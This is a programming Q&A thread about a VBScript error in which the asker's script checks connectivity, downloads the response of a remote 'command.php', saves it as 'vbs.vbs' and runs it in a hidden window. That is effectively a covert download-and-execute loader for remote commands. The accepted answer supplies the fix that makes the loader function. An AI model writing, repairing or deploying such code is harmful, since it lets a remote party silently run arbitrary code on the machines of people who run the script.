# Error with "null" in description when trying to Ping from vbscript

Tags: vbscript

Why doesn't it work?

```
Dim HTTPobj

Set HTTPobj = CreateObject("Microsoft.XMLHTTP")

iPing = Ping("www.google.com")

If iPing=0 Then
    Call HTTPobj.Open("GET","www.example.com/command.php")
    Call HTTPobj.Send
    CreateObject("Scripting.FileSystemObject").CreateTextFile("vbs.vbs",True).Write(HTTPobj.ResponseText)
    WScript.CreateObject("Wscript.Shell").Run "vbs.vbs" , 0

End If

Function Ping (strTarget)
    Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
    Set colPings = objWMIService.ExecQuery ("Select * From Win32_PingStatus where Address = '" & strTarget & "'")

    For Each objPing in colPings
        Ping = objPing.StatusCode
    Next
End Function
```

It returns an error with (null) in description, line 8, character 2. It is a Call function, but I don't understand why it doesn't work.

Comment: Missing protocol?

Comment: Yes, site 'www.url.com/command.php' doesn't exist, but I think everything else is OK.

Comment: Function Ping is created to check if there is Internet on the computer. If you know any other tests please write them )

Comment: See RFC2606... use "example" for your example urls. url.com is owned by a spammy search site today, and tomorrow could point anywhere.

Answer (score 0, accepted):

Try to put http:// in the url:

```
   Call HTTPobj.Open("GET","http://www.url.com/command.php")
```

Then, set the HTTPobj to:

```
 Set HTTPobj = CreateObject("MSXML2.ServerXMLHTTP.6.0")
```

For me it worked.